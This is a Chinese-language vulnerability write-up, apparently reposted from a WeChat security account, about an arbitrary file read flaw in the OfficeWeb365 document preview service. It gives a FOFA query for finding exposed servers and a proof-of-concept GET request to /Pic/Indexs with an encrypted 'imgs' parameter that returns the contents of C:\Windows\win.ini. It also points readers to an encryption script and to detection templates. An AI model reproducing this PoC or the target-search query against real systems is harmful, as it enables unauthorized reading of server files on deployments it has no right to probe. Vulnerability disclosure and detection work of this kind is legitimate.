一、漏洞描述
Office Web 365 是专注于Office文档在线预览及PDF文档在线预览云服务,包括Microsoft Word文档在线预览、Excel表格在线预览、Powerpoint演示文档在线预览,WPS文字处理、WPS表格、WPS演示及Adobe PDF文档在线预览。广泛应用于OA办公系统、招聘网站、在线教育类网站。
该系统存在任意文件读取漏洞,通过此漏洞攻击者可读取服务器任意文件。
二、网络空间搜索引擎搜索
fofa查询
body="请输入furl参数" || header="OfficeWeb365" || banner="OfficeWeb365"三、漏洞复现
读取 C盘Windows目录下win.ini文件 POC
GET /Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1
返回如下:
HTTP/1.1 200 OKCache-Control: privateContent-Type: image/pngServer: Microsoft-IIS/8.5X-Powered-By: OfficeWeb365Date: Tue, 02 Jan 2024 11:28:12 GMTConnection: closeContent-Length: 92; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1
浏览器直接漏洞链接返回如下:
四、漏洞利用
如上图所示漏洞利用位置在
/Pic/Indexs?imgs=imgs后的参数为要读取的文件的路径+文件名
但这是个加密参数,加密脚本已经写好了,关注微信公众号 网络安全透视镜,回复 20240103 获取。
五、漏洞检测
nuclei 漏洞检测
pocsuite3漏洞检测
漏洞检测脚本已上传免费漏洞库
地址:
https://github.com/Vme18000yuan/FreePOC
免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
原文始发于微信公众号(网络安全透视镜):Office Web 365 任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论